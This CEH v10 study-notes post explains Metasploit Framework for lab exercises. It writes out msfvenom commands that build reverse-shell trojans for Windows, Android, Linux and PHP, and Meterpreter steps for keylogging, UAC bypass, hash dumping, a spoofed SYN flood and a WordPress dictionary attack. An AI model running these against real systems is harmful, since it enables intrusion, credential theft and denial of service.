This post explain what is Metasploit Framework and its uses regarding Certificated Ethical Hacker (CEH) Exam. It is not intented to be an overall review of the tool.
It is focused on CEH v10.
What is Metasploit Framework?
Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.
The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.
Jack Rhysider’s Darknet Diaries podcast made an interview to HD Moore, that covers the history of early Metasploit. You can listen to (or read) episode 114 “HD” on Darknet Diaries’ website, Spotify or Apple Podcasts.
Metasploit applications
Metasploit Framework consists of a series of applications. The ones used on CEH are:
- msfdb: manages the Metasploit framework database
- msfvenom: tool to create trojans.
- msfconsole: tool to execute exploit.
from Linux terminal opens metasploit framework.
msfdb
msfdb init
Starts Metasploit database. Before you need to have started database (for example, service postgresql start)
You may need to restart database after this (e.g. service postgresql restart). Maybe you also need to start database before this (service postgresql start).
msfvenom
msfvenom -l
List you all the available exploits in the database.
parameters
-p: Payload. Value example: windows/meterpreter/reverse_tcp
–platform: Platform. Value example: Windows
-a: Arch. Example: x86
-e: Encoder. Value example: x86/shikata_ga_nai
-b: Characters to ignore. Value exampe: “\x00” (including quotes)
LHOST=: value for local host. Example: LHOST=10.10.10.10
LPORT=: value for local port. Example: LPORT=444
-f: format of output. Example: exe , or elf
>: path for output. Example: Desktop/Backdoor.exe
-o: also path for output
Payloads
windows/meterpreter/reverse_tcp
Used to connect to remote Windows machines.
php/meterpreter/reverse_tcp
Generates a PHP file. It must be copied to a text file and saved and PHP. Then you must try to run it on a web server
android/meterpreter/reverse_tcp
Generate an apk file for Android.
linux/x86/shell/reverse_tcp
Generate file for Linux
Examples
msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -e x86/shikata_ga_nai -b “\x00” LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw [generates a file]
msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 –platform linux -f elf > /root/Desktop/exploit.elf
msfconsole
msfconsole commands
hosts
Displays hosts on subnetwork.
services
Displays services on active hosts.
db_status
Checks db status. If database is not connected, maybe you need to initialize it.
If message is success (e.g., postgresql connected to msf), everything is correct.
If it is not correct, you may need to run msfdb correctly.
db_import <filename>
Imports a file in msf database to local disk.
nmap
Calls nmap command.
db_nmap
I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.
use <module name with path>
Enters to a msf module. Value example: scanner/smb/smb_version
show auxiliary
Lists the available auxiliary tools.
show exploits
Lists the available exploits.
show payloads
Lists the available payloads.
background
Sets a multi/handler session to background and goes back to msf shell.
Auxiliary modules
auxiliary/scanner/smb/smb_version
SMB scanner module scanner/smb/smb_version to get OS flavour.
Seen on CEHv10, mod. 2, ex. 5.
show options
set RHOSTS 10.10.10.8-16
set THREADS 100
run
auxiliary/scanner/snmp/snmp_login
Seen on CEHv10, mod. 4, ex. 9.
set RHOSTS 10.10.10.12
exploit
auxiliary/scanner/snmp/snmp_enum
Seen on CEHv10, mod. 4, ex. 9.
set RHOSTS 10.10.10.12
exploit
Exploit modules
exploit/multi/handler
Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC"
set payload windows/meterpreter/reverse_tcp
Sets payload.
set LHOST 10.10.10.11
Set local host.
Set LPORT <port number>
For example, 4444
exploit -j -z
Exploit. -j means that it is run in background with one or more session. -z is the same, but just with one session. I ignore what it means when both are executed.
Then we must wait until a connection appears, it means, a compromised computer executes the corresponding payload executable created with msfvenom.
sessions -i 1
Selects session 1. Example: sessions -i 1
ps
See processes.
getuid
Get remote machine username.
whoami
Displays current user.
sysinfo
Get system info.
getsystem -t 1
Escalate priviledges. If it does not work, you can try exploit/windows/local/bypassuac/fodhelper.
pwd
Displays current path.
ifconfig
Check IP.
timestomp secret.txt -v
Displays the created time, accessed time, modified time, and entry modified time]
download <filename>
Download file from remote folder to local Home folder. Example: download bootmgr
search -f “filename.ext”
Search for a file.
keyscan_start
Captures all keyboard input from the victim system.
keyscan_dump
View captured keyboard input.
idletime
Display idletime in seconds.
shutdown
Shutdowns computer.
execute -f cmd.exe -c -H , and then, shell
Executes Windows shell in remote computer.
exploit/windows/local/bypassuac_fodhelper
It is used once a connection has been established with exploit/multi/handler. It allows getsystem command to succeed.
Seen on CEHv10, mod. 5, ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
It is used to escalate privileges.
show options
Display all options related to module.
set SESSION <session number>
Select the opene session with exploit/multi/handler. Example: set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 10.10.10.11
set TARGET 0
Sets exploit target id.
exploit
Runs exploit. If it is successful, it allows to escalates privileges by running getsystem.
run post/windows/gather/smart_hashdump
Dumps Windows hash.
auxiliary/dos/tcp/synflood
Performs a SYN flood on objective. Seen in module 10, lab/exercise 1.
set RHOST [IP Address of Windows 10] and press Enter
Type set RPORT 21 and press Enter
Type set SHOST [IP Address of Windows Server 2016] and press Enter [set spoofable IP address]
Type set TIMEOUT 20000 [number of seconds to wait for new data]
auxiliary/scanner/http/wordpress_login_enum
This module is used to perform a dictionary attack against a WordPress web.
Featured in module 14, exercise 2.
show options
Display options.
set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
Set file containing the passwords to perform dictionary attack.
set RHOSTS [IP Address of Windows Server 2012]
Enter to set the target IP Address, e.g., Windows Server 2012 IP Address.
set RPORT 8080
Enter to set the target machine port, e.g., Windows Server 2012 port.
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/
Set the base path to the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.
set USERNAME admin
Set the username to try to crack.
run
Run exploit. You must search among all the results and look for the lines marked in green.
CEHv10 exercises where Metasploit Framework is featured
- Mod. 2 “Information Gathering”
- Ex. 5 “Information gathering using Metasploit”
- Mod. 4 “Enumeration”
- Ex. 9 “SNMP Enumeration Using snmp_enum”
- Mod. 6 “System Hacking”
- Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
- Ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
- Ex. 6. “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
- Mod. 12
- Ex. 5 “Bypassing Windows Firewall using Metasploit”
- Mod. 14
- Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
- Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
- Mod. 17 “Hacking Mobile Platforms”
- Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
- Mod. 19
- Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”